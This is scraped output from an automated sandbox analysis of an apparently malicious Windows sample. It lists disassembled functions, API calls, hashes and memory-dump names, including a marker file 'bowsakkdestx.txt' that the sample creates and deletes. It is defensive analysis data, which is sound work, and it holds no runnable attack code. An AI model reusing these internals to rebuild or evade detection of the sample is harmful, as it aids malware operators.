                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __aulldvrm
                                                                                                                                                                        • String ID: $+$0123456789ABCDEF
                                                                                                                                                                        • API String ID: 1302938615-1400378107
                                                                                                                                                                        • Opcode ID: c4b65205991d7faadfd89a6c019ee689e347eeb3904b86b288da2a91fb970852
                                                                                                                                                                        • Instruction ID: da8481e7a29a016beaf71f72868cdc7fae135cb03aa52e872deb200fc00853b5
                                                                                                                                                                        • Opcode Fuzzy Hash: c4b65205991d7faadfd89a6c019ee689e347eeb3904b86b288da2a91fb970852
                                                                                                                                                                        • Instruction Fuzzy Hash: FE818EB1A087919FD710CF2A9840A2BBBE5FFD8744F150A9DF98997351D730ED018B92
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA7BA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                        • Opcode ID: a6fce066601bd783810d75e43b0aa94f9dfffba74059849837dce922726678b2
                                                                                                                                                                        • Instruction ID: 4438dfc30597c28cfab0107905afe0a611595579ee8a3bd412c5860da0d895f3
                                                                                                                                                                        • Opcode Fuzzy Hash: a6fce066601bd783810d75e43b0aa94f9dfffba74059849837dce922726678b2
                                                                                                                                                                        • Instruction Fuzzy Hash: 0851C37274C1049BDB24CF1CDC84A6A77E6EF86710B2489ADF846CB741EE31DD508BA4
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BA4160 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memmove
                                                                                                                                                                        • String ID: invalid string position$string too long
                                                                                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                                                                                        • Opcode ID: 05b2969bd22f04488ca94a28a1033411ee20e1bb262140ac8a7d19541986219a
                                                                                                                                                                        • Instruction ID: e9a6aef1367425fc40ec05127a7b9d09724c274b9901f66b6891eb3ff1e1811a
                                                                                                                                                                        • Opcode Fuzzy Hash: 05b2969bd22f04488ca94a28a1033411ee20e1bb262140ac8a7d19541986219a
                                                                                                                                                                        • Instruction Fuzzy Hash: BE310831318304ABDB24DF4CDC85A6AB7E6EBC27107204A9DF865DB781D7B1ED418BA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9C5C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • UuidCreate.RPCRT4(?), ref: 00B9C5DA
                                                                                                                                                                        • UuidToStringA.RPCRT4(?,00000000), ref: 00B9C5F6
                                                                                                                                                                        • RpcStringFreeA.RPCRT4(00000000), ref: 00B9C640
                                                                                                                                                                        Strings
                                                                                                                                                                        • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 00B9C687
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: StringUuid$CreateFree
                                                                                                                                                                        • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                                                                                                        • API String ID: 3044360575-2335240114
                                                                                                                                                                        • Opcode ID: a215e2cf91c1ba34752733a0a35bf396185f7c2505c5d7db84615633a3ea06a6
                                                                                                                                                                        • Instruction ID: b31bc040e8994c69fed4c652f94cecf4fbc603af026717225f2da118d879dbbe
                                                                                                                                                                        • Opcode Fuzzy Hash: a215e2cf91c1ba34752733a0a35bf396185f7c2505c5d7db84615633a3ea06a6
                                                                                                                                                                        • Instruction Fuzzy Hash: C021F976208305ABDB20DF28D844B9FBFE8EF81754F004AAEF485932A1D775D544C792
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9C470 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00B9C48B
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00B9C4A9
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$AppendFolder
                                                                                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                                                                                        • API String ID: 29327785-2616962270
                                                                                                                                                                        • Opcode ID: 66bba9734acab526e7655de563aebf374401cf3af53837ca4fe9bab4ac303379
                                                                                                                                                                        • Instruction ID: 4ed4fc43e27829c057d51ad414819b442745a3f1fc8b4b1d51bdbe9c2817e348
                                                                                                                                                                        • Opcode Fuzzy Hash: 66bba9734acab526e7655de563aebf374401cf3af53837ca4fe9bab4ac303379
                                                                                                                                                                        • Instruction Fuzzy Hash: 3801DB7268032837DE307A546C86FFF779C8B51B22F0000E6FE08D6241D5E1559687E1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BABA10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00BABA4A
                                                                                                                                                                        • RegisterClassExW.USER32(00000030), ref: 00BABA73
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ClassCursorLoadRegister
                                                                                                                                                                        • String ID: 0$LPCWSTRszWindowClass
                                                                                                                                                                        • API String ID: 1693014935-1496217519
                                                                                                                                                                        • Opcode ID: 84aacffac1a8df2aea0ebb7d5fd4aabf5f6f0f7633e6a054626d1a3eef7ab87d
                                                                                                                                                                        • Instruction ID: a66585d87373e40ed7d4c2e5ccf6c5e305c8d2d631b909b7beefe8d240710b60
                                                                                                                                                                        • Opcode Fuzzy Hash: 84aacffac1a8df2aea0ebb7d5fd4aabf5f6f0f7633e6a054626d1a3eef7ab87d
                                                                                                                                                                        • Instruction Fuzzy Hash: 7BF0AFB4C0431C9BEF00DF90D9597DEBBB4BB08309F104149D4147A280D7BA1648CF95
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00B9C420 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00B9C438
                                                                                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00B9C44E
                                                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00B9C45B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Path$AppendDeleteFileFolder
                                                                                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                                                                                        • API String ID: 610490371-2616962270
                                                                                                                                                                        • Opcode ID: 209f34e6997c758eb5dbe30804599a4492632f6464b46d2562c0c256250ed310
                                                                                                                                                                        • Instruction ID: 12edb67d399f989d369d2e1eef34bfbfddeb4dedb4ed328a189f612b4861e326
                                                                                                                                                                        • Opcode Fuzzy Hash: 209f34e6997c758eb5dbe30804599a4492632f6464b46d2562c0c256250ed310
                                                                                                                                                                        • Instruction Fuzzy Hash: DDE0867964031C6BEF20ABA0DDCAFDD776C9B04B02F0040E2BB44E21D1D6B0A5C48B51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BB2130 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2974526305-0
                                                                                                                                                                        • Opcode ID: 4f8a020f16c05ce8eb09244123f141b643e409d9ae385191a5e5949e342c4f07
                                                                                                                                                                        • Instruction ID: 3bd418d6246d18b641cd0d476a5223d47e15a581f7caa6abdb01629d27156f6c
                                                                                                                                                                        • Opcode Fuzzy Hash: 4f8a020f16c05ce8eb09244123f141b643e409d9ae385191a5e5949e342c4f07
                                                                                                                                                                        • Instruction Fuzzy Hash: 24519E31A006059BDB249FA9C880AFEB7F1EF15320F2487A9F935E62D0D7F09D509B50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BCC677 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00BCC6AD
                                                                                                                                                                        • __isleadbyte_l.LIBCMT ref: 00BCC6DB
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000,1C74C085,00000000,00000000,1C74C085,00BCC0ED,?,00BFBBEF,00000003), ref: 00BCC709
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000,1C74C085,00000000,00000000,1C74C085,00BCC0ED,?,00BFBBEF,00000003), ref: 00BCC73F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3058430110-0
                                                                                                                                                                        • Opcode ID: 073337a300b3547daa66b4efb56e33779d5db72de013a34538d165dacb5c51e3
                                                                                                                                                                        • Instruction ID: 53d813c410525db1d489222b011e42c57a6dcfb4b98e8c0f79bb7919bf375e9b
                                                                                                                                                                        • Opcode Fuzzy Hash: 073337a300b3547daa66b4efb56e33779d5db72de013a34538d165dacb5c51e3
                                                                                                                                                                        • Instruction Fuzzy Hash: 62319A31600246AFDB218E65C984FAA7FE9FF51350F1585AEE8698B1A0E730EC51DB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00C57094 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • ___BuildCatchObject.LIBCMT ref: 00C570AB
                                                                                                                                                                          • Part of subcall function 00C577A0: ___BuildCatchObjectHelper.LIBCMT ref: 00C577D2
                                                                                                                                                                          • Part of subcall function 00C577A0: ___AdjustPointer.LIBCMT ref: 00C577E9
                                                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 00C570C2
                                                                                                                                                                        • ___FrameUnwindToState.LIBCMT ref: 00C570D4
                                                                                                                                                                        • CallCatchBlock.LIBCMT ref: 00C570F8
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2901542994-0
                                                                                                                                                                        • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                                                                        • Instruction ID: a97c5d7d6a40113ad42420a7ef4366fbfe9c1c0a285ac9992c4bd5b0ba12654c
                                                                                                                                                                        • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                                                                        • Instruction Fuzzy Hash: 70011336000108BBCF12AF55EC05EDA7BBAEF88755F148114FD1862121D372E9E5EBA8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BB53B3 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BB5007: __getptd_noexit.LIBCMT ref: 00BB5008
                                                                                                                                                                          • Part of subcall function 00BB5007: __amsg_exit.LIBCMT ref: 00BB5015
                                                                                                                                                                        • __calloc_crt.LIBCMT ref: 00BB5A01
                                                                                                                                                                          • Part of subcall function 00BB8C96: __calloc_impl.LIBCMT ref: 00BB8CA5
                                                                                                                                                                        • __lock.LIBCMT ref: 00BB5A37
                                                                                                                                                                        • ___addlocaleref.LIBCMT ref: 00BB5A43
                                                                                                                                                                        • __lock.LIBCMT ref: 00BB5A57
                                                                                                                                                                          • Part of subcall function 00BB5208: __getptd_noexit.LIBCMT ref: 00BB5208
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2361991946.0000000000C9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362035253.0000000000C9C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CAA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362079025.0000000000CB9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000003.00000002.2362238587.0000000000CBB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_3_2_b90000_9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_paylo.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2580527540-0
                                                                                                                                                                        • Opcode ID: d9596a4ebf2ddb02f39d50569656233901e6ab92360b795c72915d79d47930bb
                                                                                                                                                                        • Instruction ID: 9f35efe768c9a143698d04fae872cf857383e7f4dbaac62cf369f789abd032f6
                                                                                                                                                                        • Opcode Fuzzy Hash: d9596a4ebf2ddb02f39d50569656233901e6ab92360b795c72915d79d47930bb
                                                                                                                                                                        • Instruction Fuzzy Hash: B1014C71541B00DFE731FFA88446BAD7BE4AF45720F2042C9F4A5AB2C2CEF45941CA66
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BD09B9 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                                                                                                        • Associated: 00000003.00000002.2361798189.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
